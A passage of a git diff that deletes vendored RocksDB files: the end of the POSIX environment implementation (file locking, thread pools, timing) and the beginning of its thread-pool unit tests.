-    if (stat(fname.c_str(), &sbuf) != 0) {
-      *size = 0;
-      s = IOError("while stat a file for size", fname, errno);
-    } else {
-      *size = sbuf.st_size;
-    }
-    return s;
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) override {
-    struct stat s;
-    if (stat(fname.c_str(), &s) !=0) {
-      return IOError("while stat a file for modification time", fname, errno);
-    }
-    *file_mtime = static_cast<uint64_t>(s.st_mtime);
-    return Status::OK();
-  }
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) override {
-    Status result;
-    if (rename(src.c_str(), target.c_str()) != 0) {
-      result = IOError("While renaming a file to " + target, src, errno);
-    }
-    return result;
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& target) override {
-    Status result;
-    if (link(src.c_str(), target.c_str()) != 0) {
-      if (errno == EXDEV) {
-        return Status::NotSupported("No cross FS links allowed");
-      }
-      result = IOError("while link file to " + target, src, errno);
-    }
-    return result;
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    *lock = nullptr;
-    Status result;
-    int fd;
-    {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), O_RDWR | O_CREAT, 0644);
-    }
-    if (fd < 0) {
-      result = IOError("while open a file for lock", fname, errno);
-    } else if (LockOrUnlock(fname, fd, true) == -1) {
-      result = IOError("While lock file", fname, errno);
-      close(fd);
-    } else {
-      SetFD_CLOEXEC(fd, nullptr);
-      PosixFileLock* my_lock = new PosixFileLock;
-      my_lock->fd_ = fd;
-      my_lock->filename = fname;
-      *lock = my_lock;
-    }
-    return result;
-  }
-
-  virtual Status UnlockFile(FileLock* lock) override {
-    PosixFileLock* my_lock = reinterpret_cast<PosixFileLock*>(lock);
-    Status result;
-    if (LockOrUnlock(my_lock->filename, my_lock->fd_, false) == -1) {
-      result = IOError("unlock", my_lock->filename, errno);
-    }
-    close(my_lock->fd_);
-    delete my_lock;
-    return result;
-  }
-
-  virtual void Schedule(void (*function)(void* arg1), void* arg,
-                        Priority pri = LOW, void* tag = nullptr,
-                        void (*unschedFunction)(void* arg) = 0) override;
-
-  virtual int UnSchedule(void* arg, Priority pri) override;
-
-  virtual void StartThread(void (*function)(void* arg), void* arg) override;
-
-  virtual void WaitForJoin() override;
-
-  virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const override;
-
-  virtual Status GetTestDirectory(std::string* result) override {
-    const char* env = getenv("TEST_TMPDIR");
-    if (env && env[0] != '\0') {
-      *result = env;
-    } else {
-      char buf[100];
-      snprintf(buf, sizeof(buf), "/tmp/rocksdbtest-%d", int(geteuid()));
-      *result = buf;
-    }
-    // Directory may already exist
-    CreateDir(*result);
-    return Status::OK();
-  }
-
-  virtual Status GetThreadList(
-      std::vector<ThreadStatus>* thread_list) override {
-    assert(thread_status_updater_);
-    return thread_status_updater_->GetThreadList(thread_list);
-  }
-
-  static uint64_t gettid(pthread_t tid) {
-    uint64_t thread_id = 0;
-    memcpy(&thread_id, &tid, std::min(sizeof(thread_id), sizeof(tid)));
-    return thread_id;
-  }
-
-  static uint64_t gettid() {
-    pthread_t tid = pthread_self();
-    return gettid(tid);
-  }
-
-  virtual uint64_t GetThreadID() const override {
-    return gettid(pthread_self());
-  }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    FILE* f;
-    {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      f = fopen(fname.c_str(), "w");
-    }
-    if (f == nullptr) {
-      result->reset();
-      return IOError("when fopen a file for new logger", fname, errno);
-    } else {
-      int fd = fileno(f);
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-      fallocate(fd, FALLOC_FL_KEEP_SIZE, 0, 4 * 1024);
-#endif
-      SetFD_CLOEXEC(fd, nullptr);
-      result->reset(new PosixLogger(f, &PosixEnv::gettid, this));
-      return Status::OK();
-    }
-  }
-
-  virtual uint64_t NowMicros() override {
-    struct timeval tv;
-    gettimeofday(&tv, nullptr);
-    return static_cast<uint64_t>(tv.tv_sec) * 1000000 + tv.tv_usec;
-  }
-
-  virtual uint64_t NowNanos() override {
-#if defined(OS_LINUX) || defined(OS_FREEBSD) || defined(OS_AIX)
-    struct timespec ts;
-    clock_gettime(CLOCK_MONOTONIC, &ts);
-    return static_cast<uint64_t>(ts.tv_sec) * 1000000000 + ts.tv_nsec;
-#elif defined(OS_SOLARIS)
-    return gethrtime();
-#elif defined(__MACH__)
-    clock_serv_t cclock;
-    mach_timespec_t ts;
-    host_get_clock_service(mach_host_self(), CALENDAR_CLOCK, &cclock);
-    clock_get_time(cclock, &ts);
-    mach_port_deallocate(mach_task_self(), cclock);
-    return static_cast<uint64_t>(ts.tv_sec) * 1000000000 + ts.tv_nsec;
-#else
-    return std::chrono::duration_cast<std::chrono::nanoseconds>(
-       std::chrono::steady_clock::now().time_since_epoch()).count();
-#endif
-  }
-
-  virtual void SleepForMicroseconds(int micros) override { usleep(micros); }
-
-  virtual Status GetHostName(char* name, uint64_t len) override {
-    int ret = gethostname(name, static_cast<size_t>(len));
-    if (ret < 0) {
-      if (errno == EFAULT || errno == EINVAL)
-        return Status::InvalidArgument(strerror(errno));
-      else
-        return IOError("GetHostName", name, errno);
-    }
-    return Status::OK();
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) override {
-    time_t ret = time(nullptr);
-    if (ret == (time_t) -1) {
-      return IOError("GetCurrentTime", "", errno);
-    }
-    *unix_time = (int64_t) ret;
-    return Status::OK();
-  }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-                                 std::string* output_path) override {
-    if (db_path.find('/') == 0) {
-      *output_path = db_path;
-      return Status::OK();
-    }
-
-    char the_path[256];
-    char* ret = getcwd(the_path, 256);
-    if (ret == nullptr) {
-      return Status::IOError(strerror(errno));
-    }
-
-    *output_path = ret;
-    return Status::OK();
-  }
-
-  // Allow increasing the number of worker threads.
-  virtual void SetBackgroundThreads(int num, Priority pri) override {
-    assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-    thread_pools_[pri].SetBackgroundThreads(num);
-  }
-
-  virtual int GetBackgroundThreads(Priority pri) override {
-    assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-    return thread_pools_[pri].GetBackgroundThreads();
-  }
-
-  // Allow increasing the number of worker threads.
-  virtual void IncBackgroundThreadsIfNeeded(int num, Priority pri) override {
-    assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-    thread_pools_[pri].IncBackgroundThreadsIfNeeded(num);
-  }
-
-  virtual void LowerThreadPoolIOPriority(Priority pool = LOW) override {
-    assert(pool >= Priority::BOTTOM && pool <= Priority::HIGH);
-#ifdef OS_LINUX
-    thread_pools_[pool].LowerIOPriority();
-#endif
-  }
-
-  virtual std::string TimeToString(uint64_t secondsSince1970) override {
-    const time_t seconds = (time_t)secondsSince1970;
-    struct tm t;
-    int maxsize = 64;
-    std::string dummy;
-    dummy.reserve(maxsize);
-    dummy.resize(maxsize);
-    char* p = &dummy[0];
-    localtime_r(&seconds, &t);
-    snprintf(p, maxsize,
-             "%04d/%02d/%02d-%02d:%02d:%02d ",
-             t.tm_year + 1900,
-             t.tm_mon + 1,
-             t.tm_mday,
-             t.tm_hour,
-             t.tm_min,
-             t.tm_sec);
-    return dummy;
-  }
-
-  EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-                                 const DBOptions& db_options) const override {
-    EnvOptions optimized = env_options;
-    optimized.use_mmap_writes = false;
-    optimized.use_direct_writes = false;
-    optimized.bytes_per_sync = db_options.wal_bytes_per_sync;
-    // TODO(icanadi) it's faster if fallocate_with_keep_size is false, but it
-    // breaks TransactionLogIteratorStallAtLastRecord unit test. Fix the unit
-    // test and make this false
-    optimized.fallocate_with_keep_size = true;
-    return optimized;
-  }
-
-  EnvOptions OptimizeForManifestWrite(
-      const EnvOptions& env_options) const override {
-    EnvOptions optimized = env_options;
-    optimized.use_mmap_writes = false;
-    optimized.use_direct_writes = false;
-    optimized.fallocate_with_keep_size = true;
-    return optimized;
-  }
-
- private:
-  bool checkedDiskForMmap_;
-  bool forceMmapOff_;  // do we override Env options?
-
-  // Returns true iff the named directory exists and is a directory.
-  virtual bool DirExists(const std::string& dname) {
-    struct stat statbuf;
-    if (stat(dname.c_str(), &statbuf) == 0) {
-      return S_ISDIR(statbuf.st_mode);
-    }
-    return false; // stat() failed return false
-  }
-
-  bool SupportsFastAllocate(const std::string& path) {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-    struct statfs s;
-    if (statfs(path.c_str(), &s)){
-      return false;
-    }
-    switch (s.f_type) {
-      case EXT4_SUPER_MAGIC:
-        return true;
-      case XFS_SUPER_MAGIC:
-        return true;
-      case TMPFS_MAGIC:
-        return true;
-      default:
-        return false;
-    }
-#else
-    return false;
-#endif
-  }
-
-  size_t page_size_;
-
-  std::vector<ThreadPoolImpl> thread_pools_;
-  pthread_mutex_t mu_;
-  std::vector<pthread_t> threads_to_join_;
-};
-
-PosixEnv::PosixEnv()
-    : checkedDiskForMmap_(false),
-      forceMmapOff_(false),
-      page_size_(getpagesize()),
-      thread_pools_(Priority::TOTAL) {
-  ThreadPoolImpl::PthreadCall("mutex_init", pthread_mutex_init(&mu_, nullptr));
-  for (int pool_id = 0; pool_id < Env::Priority::TOTAL; ++pool_id) {
-    thread_pools_[pool_id].SetThreadPriority(
-        static_cast<Env::Priority>(pool_id));
-    // This allows later initializing the thread-local-env of each thread.
-    thread_pools_[pool_id].SetHostEnv(this);
-  }
-  thread_status_updater_ = CreateThreadStatusUpdater();
-}
-
-void PosixEnv::Schedule(void (*function)(void* arg1), void* arg, Priority pri,
-                        void* tag, void (*unschedFunction)(void* arg)) {
-  assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-  thread_pools_[pri].Schedule(function, arg, tag, unschedFunction);
-}
-
-int PosixEnv::UnSchedule(void* arg, Priority pri) {
-  return thread_pools_[pri].UnSchedule(arg);
-}
-
-unsigned int PosixEnv::GetThreadPoolQueueLen(Priority pri) const {
-  assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-  return thread_pools_[pri].GetQueueLen();
-}
-
-struct StartThreadState {
-  void (*user_function)(void*);
-  void* arg;
-};
-
-static void* StartThreadWrapper(void* arg) {
-  StartThreadState* state = reinterpret_cast<StartThreadState*>(arg);
-  state->user_function(state->arg);
-  delete state;
-  return nullptr;
-}
-
-void PosixEnv::StartThread(void (*function)(void* arg), void* arg) {
-  pthread_t t;
-  StartThreadState* state = new StartThreadState;
-  state->user_function = function;
-  state->arg = arg;
-  ThreadPoolImpl::PthreadCall(
-      "start thread", pthread_create(&t, nullptr, &StartThreadWrapper, state));
-  ThreadPoolImpl::PthreadCall("lock", pthread_mutex_lock(&mu_));
-  threads_to_join_.push_back(t);
-  ThreadPoolImpl::PthreadCall("unlock", pthread_mutex_unlock(&mu_));
-}
-
-void PosixEnv::WaitForJoin() {
-  for (const auto tid : threads_to_join_) {
-    pthread_join(tid, nullptr);
-  }
-  threads_to_join_.clear();
-}
-
-}  // namespace
-
-std::string Env::GenerateUniqueId() {
-  std::string uuid_file = "/proc/sys/kernel/random/uuid";
-
-  Status s = FileExists(uuid_file);
-  if (s.ok()) {
-    std::string uuid;
-    s = ReadFileToString(this, uuid_file, &uuid);
-    if (s.ok()) {
-      return uuid;
-    }
-  }
-  // Could not read uuid_file - generate uuid using "nanos-random"
-  Random64 r(time(nullptr));
-  uint64_t random_uuid_portion =
-    r.Uniform(std::numeric_limits<uint64_t>::max());
-  uint64_t nanos_uuid_portion = NowNanos();
-  char uuid2[200];
-  snprintf(uuid2,
-           200,
-           "%lx-%lx",
-           (unsigned long)nanos_uuid_portion,
-           (unsigned long)random_uuid_portion);
-  return uuid2;
-}
-
-//
-// Default Posix Env
-//
-Env* Env::Default() {
-  // The following function call initializes the singletons of ThreadLocalPtr
-  // right before the static default_env.  This guarantees default_env will
-  // always being destructed before the ThreadLocalPtr singletons get
-  // destructed as C++ guarantees that the destructions of static variables
-  // is in the reverse order of their constructions.
-  //
-  // Since static members are destructed in the reverse order
-  // of their construction, having this call here guarantees that
-  // the destructor of static PosixEnv will go first, then the
-  // the singletons of ThreadLocalPtr.
-  ThreadLocalPtr::InitSingletons();
-  static PosixEnv default_env;
-  return &default_env;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env_test.cc b/thirdparty/rocksdb/env/env_test.cc
deleted file mode 100644
index 9ec2f14..0000000
--- a/thirdparty/rocksdb/env/env_test.cc
+++ /dev/null
@@ -1,1498 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef OS_WIN
-#include <sys/ioctl.h>
-#endif
-
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-#ifdef OS_FREEBSD
-#include <malloc_np.h>
-#else
-#include <malloc.h>
-#endif
-#endif
-#include <sys/types.h>
-
-#include <iostream>
-#include <unordered_set>
-#include <atomic>
-#include <list>
-
-#ifdef OS_LINUX
-#include <fcntl.h>
-#include <linux/fs.h>
-#include <stdlib.h>
-#include <sys/stat.h>
-#include <unistd.h>
-#endif
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-#include <errno.h>
-#endif
-
-#include "env/env_chroot.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/log_buffer.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifdef OS_LINUX
-static const size_t kPageSize = sysconf(_SC_PAGESIZE);
-#else
-static const size_t kPageSize = 4 * 1024;
-#endif
-
-namespace rocksdb {
-
-static const int kDelayMicros = 100000;
-
-struct Deleter {
-  explicit Deleter(void (*fn)(void*)) : fn_(fn) {}
-
-  void operator()(void* ptr) {
-    assert(fn_);
-    assert(ptr);
-    (*fn_)(ptr);
-  }
-
-  void (*fn_)(void*);
-};
-
-std::unique_ptr<char, Deleter> NewAligned(const size_t size, const char ch) {
-  char* ptr = nullptr;
-#ifdef OS_WIN
-  if (!(ptr = reinterpret_cast<char*>(_aligned_malloc(size, kPageSize)))) {
-    return std::unique_ptr<char, Deleter>(nullptr, Deleter(_aligned_free));
-  }
-  std::unique_ptr<char, Deleter> uptr(ptr, Deleter(_aligned_free));
-#else
-  if (posix_memalign(reinterpret_cast<void**>(&ptr), kPageSize, size) != 0) {
-    return std::unique_ptr<char, Deleter>(nullptr, Deleter(free));
-  }
-  std::unique_ptr<char, Deleter> uptr(ptr, Deleter(free));
-#endif
-  memset(uptr.get(), ch, size);
-  return uptr;
-}
-
-class EnvPosixTest : public testing::Test {
- private:
-  port::Mutex mu_;
-  std::string events_;
-
- public:
-  Env* env_;
-  bool direct_io_;
-  EnvPosixTest() : env_(Env::Default()), direct_io_(false) {}
-};
-
-class EnvPosixTestWithParam
-    : public EnvPosixTest,
-      public ::testing::WithParamInterface<std::pair<Env*, bool>> {
- public:
-  EnvPosixTestWithParam() {
-    std::pair<Env*, bool> param_pair = GetParam();
-    env_ = param_pair.first;
-    direct_io_ = param_pair.second;
-  }
-
-  void WaitThreadPoolsEmpty() {
-    // Wait until the thread pools are empty.
-    while (env_->GetThreadPoolQueueLen(Env::Priority::LOW) != 0) {
-      Env::Default()->SleepForMicroseconds(kDelayMicros);
-    }
-    while (env_->GetThreadPoolQueueLen(Env::Priority::HIGH) != 0) {
-      Env::Default()->SleepForMicroseconds(kDelayMicros);
-    }
-  }
-
-  ~EnvPosixTestWithParam() { WaitThreadPoolsEmpty(); }
-};
-
-static void SetBool(void* ptr) {
-  reinterpret_cast<std::atomic<bool>*>(ptr)->store(true);
-}
-
-TEST_F(EnvPosixTest, RunImmediately) {
-  for (int pri = Env::BOTTOM; pri < Env::TOTAL; ++pri) {
-    std::atomic<bool> called(false);
-    env_->SetBackgroundThreads(1, static_cast<Env::Priority>(pri));
-    env_->Schedule(&SetBool, &called, static_cast<Env::Priority>(pri));
-    Env::Default()->SleepForMicroseconds(kDelayMicros);
-    ASSERT_TRUE(called.load());
-  }
-}
-
-TEST_P(EnvPosixTestWithParam, UnSchedule) {
-  std::atomic<bool> called(false);
-  env_->SetBackgroundThreads(1, Env::LOW);
-
-  /* Block the low priority queue */
-  test::SleepingBackgroundTask sleeping_task, sleeping_task1;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::LOW);
-
-  /* Schedule another task */
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task1,
-                 Env::Priority::LOW, &sleeping_task1);
-
-  /* Remove it with a different tag  */
-  ASSERT_EQ(0, env_->UnSchedule(&called, Env::Priority::LOW));
-
-  /* Remove it from the queue with the right tag */
-  ASSERT_EQ(1, env_->UnSchedule(&sleeping_task1, Env::Priority::LOW));
-
-  // Unblock background thread
-  sleeping_task.WakeUp();
-
-  /* Schedule another task */
-  env_->Schedule(&SetBool, &called);
-  for (int i = 0; i < kDelayMicros; i++) {
-    if (called.load()) {
-      break;
-    }
-    Env::Default()->SleepForMicroseconds(1);
-  }
-  ASSERT_TRUE(called.load());
-
-  ASSERT_TRUE(!sleeping_task.IsSleeping() && !sleeping_task1.IsSleeping());
-  WaitThreadPoolsEmpty();
-}
-
-TEST_P(EnvPosixTestWithParam, RunMany) {
-  std::atomic<int> last_id(0);
-
-  struct CB {
-    std::atomic<int>* last_id_ptr;  // Pointer to shared slot
-    int id;                         // Order# for the execution of this callback
-
-    CB(std::atomic<int>* p, int i) : last_id_ptr(p), id(i) {}
-
-    static void Run(void* v) {
-      CB* cb = reinterpret_cast<CB*>(v);
-      int cur = cb->last_id_ptr->load();
-      ASSERT_EQ(cb->id - 1, cur);
-      cb->last_id_ptr->store(cb->id);
-    }
-  };
-
-  // Schedule in different order than start time
-  CB cb1(&last_id, 1);
-  CB cb2(&last_id, 2);
-  CB cb3(&last_id, 3);
-  CB cb4(&last_id, 4);
-  env_->Schedule(&CB::Run, &cb1);
-  env_->Schedule(&CB::Run, &cb2);
-  env_->Schedule(&CB::Run, &cb3);
-  env_->Schedule(&CB::Run, &cb4);
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  int cur = last_id.load(std::memory_order_acquire);
-  ASSERT_EQ(4, cur);
-  WaitThreadPoolsEmpty();
-}
-
-struct State {
-  port::Mutex mu;
-  int val;
-  int num_running;
-};
-
-static void ThreadBody(void* arg) {
-  State* s = reinterpret_cast<State*>(arg);
-  s->mu.Lock();
-  s->val += 1;
-  s->num_running -= 1;
-  s->mu.Unlock();
-}
-
-TEST_P(EnvPosixTestWithParam, StartThread) {
-  State state;
-  state.val = 0;
-  state.num_running = 3;
-  for (int i = 0; i < 3; i++) {
-    env_->StartThread(&ThreadBody, &state);
-  }
-  while (true) {
-    state.mu.Lock();
-    int num = state.num_running;
-    state.mu.Unlock();
-    if (num == 0) {
-      break;
-    }
-    Env::Default()->SleepForMicroseconds(kDelayMicros);
-  }
-  ASSERT_EQ(state.val, 3);
-  WaitThreadPoolsEmpty();
-}
-
-TEST_P(EnvPosixTestWithParam, TwoPools) {
-  // Data structures to signal tasks to run.
-  port::Mutex mutex;
-  port::CondVar cv(&mutex);
-  bool should_start = false;
-
-  class CB {
-   public:
-    CB(const std::string& pool_name, int pool_size, port::Mutex* trigger_mu,
-       port::CondVar* trigger_cv, bool* _should_start)
-        : mu_(),
-          num_running_(0),
-          num_finished_(0),
-          pool_size_(pool_size),
-          pool_name_(pool_name),
-          trigger_mu_(trigger_mu),
-          trigger_cv_(trigger_cv),
-          should_start_(_should_start) {}
-
-    static void Run(void* v) {
-      CB* cb = reinterpret_cast<CB*>(v);
-      cb->Run();
-    }
-
-    void Run() {
-      {
-        MutexLock l(&mu_);
-        num_running_++;
-        // make sure we don't have more than pool_size_ jobs running.
-        ASSERT_LE(num_running_, pool_size_.load());
-      }
-
-      {
-        MutexLock l(trigger_mu_);
-        while (!(*should_start_)) {
-          trigger_cv_->Wait();
-        }
-      }
-
-      {
-        MutexLock l(&mu_);
-        num_running_--;
-        num_finished_++;
-      }
-    }
-
-    int NumFinished() {
-      MutexLock l(&mu_);
-      return num_finished_;
-    }
-
-    void Reset(int pool_size) {
-      pool_size_.store(pool_size);
-      num_finished_ = 0;
-    }
-
-   private:
-    port::Mutex mu_;
-    int num_running_;
-    int num_finished_;
-    std::atomic<int> pool_size_;
-    std::string pool_name_;
-    port::Mutex* trigger_mu_;
-    port::CondVar* trigger_cv_;
-    bool* should_start_;
-  };
-
-  const int kLowPoolSize = 2;
-  const int kHighPoolSize = 4;
-  const int kJobs = 8;
-
-  CB low_pool_job("low", kLowPoolSize, &mutex, &cv, &should_start);
-  CB high_pool_job("high", kHighPoolSize, &mutex, &cv, &should_start);
-
-  env_->SetBackgroundThreads(kLowPoolSize);
-  env_->SetBackgroundThreads(kHighPoolSize, Env::Priority::HIGH);
-
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // schedule same number of jobs in each pool
-  for (int i = 0; i < kJobs; i++) {
-    env_->Schedule(&CB::Run, &low_pool_job);
-    env_->Schedule(&CB::Run, &high_pool_job, Env::Priority::HIGH);
-  }
-  // Wait a short while for the jobs to be dispatched.
-  int sleep_count = 0;
-  while ((unsigned int)(kJobs - kLowPoolSize) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::LOW) ||
-         (unsigned int)(kJobs - kHighPoolSize) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::HIGH)) {
-    env_->SleepForMicroseconds(kDelayMicros);
-    if (++sleep_count > 100) {
-      break;
-    }
-  }
-
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen());
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ((unsigned int)(kJobs - kHighPoolSize),
-            env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // Trigger jobs to run.
-  {
-    MutexLock l(&mutex);
-    should_start = true;
-    cv.SignalAll();
-  }
-
-  // wait for all jobs to finish
-  while (low_pool_job.NumFinished() < kJobs ||
-         high_pool_job.NumFinished() < kJobs) {
-    env_->SleepForMicroseconds(kDelayMicros);
-  }
-
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // Hold jobs to schedule;
-  should_start = false;
-
-  // call IncBackgroundThreadsIfNeeded to two pools. One increasing and
-  // the other decreasing
-  env_->IncBackgroundThreadsIfNeeded(kLowPoolSize - 1, Env::Priority::LOW);
-  env_->IncBackgroundThreadsIfNeeded(kHighPoolSize + 1, Env::Priority::HIGH);
-  high_pool_job.Reset(kHighPoolSize + 1);
-  low_pool_job.Reset(kLowPoolSize);
-
-  // schedule same number of jobs in each pool
-  for (int i = 0; i < kJobs; i++) {
-    env_->Schedule(&CB::Run, &low_pool_job);
-    env_->Schedule(&CB::Run, &high_pool_job, Env::Priority::HIGH);
-  }
-  // Wait a short while for the jobs to be dispatched.
-  sleep_count = 0;
-  while ((unsigned int)(kJobs - kLowPoolSize) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::LOW) ||
-         (unsigned int)(kJobs - (kHighPoolSize + 1)) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::HIGH)) {
-    env_->SleepForMicroseconds(kDelayMicros);
-    if (++sleep_count > 100) {
-      break;
-    }
-  }
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen());
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ((unsigned int)(kJobs - (kHighPoolSize + 1)),
-            env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // Trigger jobs to run.
-  {
-    MutexLock l(&mutex);
-    should_start = true;
-    cv.SignalAll();
-  }
-
-  // wait for all jobs to finish
-  while (low_pool_job.NumFinished() < kJobs ||
-         high_pool_job.NumFinished() < kJobs) {
-    env_->SleepForMicroseconds(kDelayMicros);
-  }
-
-  env_->SetBackgroundThreads(kHighPoolSize, Env::Priority::HIGH);
-  WaitThreadPoolsEmpty();
-}
-
-TEST_P(EnvPosixTestWithParam, DecreaseNumBgThreads) {
-  std::vector<test::SleepingBackgroundTask> tasks(10);
-
-  // Set number of thread to 1 first.
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-
-  // Schedule 3 tasks. 0 running; Task 1, 2 waiting.
-  for (size_t i = 0; i < 3; i++) {
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[i],
-                   Env::Priority::HIGH);
-    Env::Default()->SleepForMicroseconds(kDelayMicros);
-  }
-  ASSERT_EQ(2U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(!tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // Increase to 2 threads. Task 0, 1 running; 2 waiting
-  env_->SetBackgroundThreads(2, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(1U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // Shrink back to 1 thread. Still task 0, 1 running, 2 waiting
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(1U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // The last task finishes. Task 0 running, 2 waiting.
-  tasks[1].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(1U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(!tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // Increase to 5 threads. Task 0 and 2 running.
-  env_->SetBackgroundThreads(5, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ((unsigned int)0, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(tasks[2].IsSleeping());
-
-  // Change number of threads a couple of times while there is no sufficient
-  // tasks.
-  env_->SetBackgroundThreads(7, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  tasks[2].WakeUp();
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(3, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(4, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(5, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(4, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros * 50);
-
-  // Enqueue 5 more tasks. Thread pool size now is 4.
-  // Task 0, 3, 4, 5 running;6, 7 waiting.
-  for (size_t i = 3; i < 8; i++) {
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[i],
-                   Env::Priority::HIGH);
-  }
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(2U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[3].IsSleeping());
-  ASSERT_TRUE(tasks[4].IsSleeping());
-  ASSERT_TRUE(tasks[5].IsSleeping());
-  ASSERT_TRUE(!tasks[6].IsSleeping());
-  ASSERT_TRUE(!tasks[7].IsSleeping());
-
-  // Wake up task 0, 3 and 4. Task 5, 6, 7 running.
-  tasks[0].WakeUp();
-  tasks[3].WakeUp();
-  tasks[4].WakeUp();
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ((unsigned int)0, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  for (size_t i = 5; i < 8; i++) {
-    ASSERT_TRUE(tasks[i].IsSleeping());
-  }
-
-  // Shrink back to 1 thread. Still task 5, 6, 7 running
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
